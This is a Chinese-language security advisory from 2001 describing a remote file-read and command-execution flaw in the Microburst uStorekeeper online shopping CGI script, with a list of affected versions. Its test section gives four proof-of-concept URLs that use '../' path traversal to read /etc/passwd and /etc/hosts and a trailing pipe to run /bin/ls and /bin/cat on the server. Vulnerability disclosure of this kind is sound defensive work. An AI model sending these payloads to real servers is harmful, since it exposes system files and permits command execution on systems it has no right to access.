Microburst uStorekeeper存在远程命令可执行漏洞

发布时间：2001-04-12
更新时间：2001-04-12
严重程度：高
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

Microburst uStorekeeper Online Shopping System 1.8.1
Microburst uStorekeeper Online Shopping System 1.6.9
Microburst uStorekeeper Online Shopping System 1.6.7
Microburst uStorekeeper Online Shopping System 1.6.1
Microburst uStorekeeper Online Shopping System 1.6
Microburst uStorekeeper Online Shopping System 1.5.5
Microburst uStorekeeper Online Shopping System 1.5.3
Microburst uStorekeeper Online Shopping System 1.5.2
Microburst uStorekeeper Online Shopping System 1.1.5
Microburst uStorekeeper Online Shopping System 1.1
Microburst uStorekeeper Online Shopping System 1.0.7
Microburst uStorekeeper Online Shopping System 1.0.5
Microburst uStorekeeper Online Shopping System 1.0.3
Microburst uStorekeeper Online Shopping System 1.0.1

详细描述
uStorekeeper Online Shopping System 中存在一个漏洞，由于脚本没有很好的对用户提供的输入进行合法性检查，远程用户可以通过发送类似'../'的URL来查看任意文件和任意命令。

测试代码
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|

解决方案
尚无

相关信息

最近严重漏洞

Microburst uStorekeeper存在远程命令可执行漏洞